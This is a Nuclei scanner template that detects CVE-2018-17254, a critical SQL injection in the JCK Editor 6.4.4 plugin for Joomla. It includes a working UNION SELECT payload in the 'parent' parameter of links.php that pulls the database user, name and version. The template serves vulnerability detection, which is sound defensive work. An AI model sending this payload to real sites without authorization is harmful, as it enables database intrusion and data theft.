nuclei-templates/cves/2018/CVE-2018-17254.yaml

33 lines
1.1 KiB
YAML

id: CVE-2018-17254
info:
name: Joomla! JCK Editor SQL Injection
author: Suman_Kar
severity: critical
description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
reference:
- http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html
- https://www.exploit-db.com/exploits/45423/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-17254
cwe-id: CWE-89
remediation: Update or remove the affected plugin.
tags: cve,cve2018,packetstorm,edb,joomla,sqli
requests:
- raw:
- |
GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
matchers:
- type: word
part: body
words:
- "nuclei-template"
# Enhanced by mp on 2022/02/08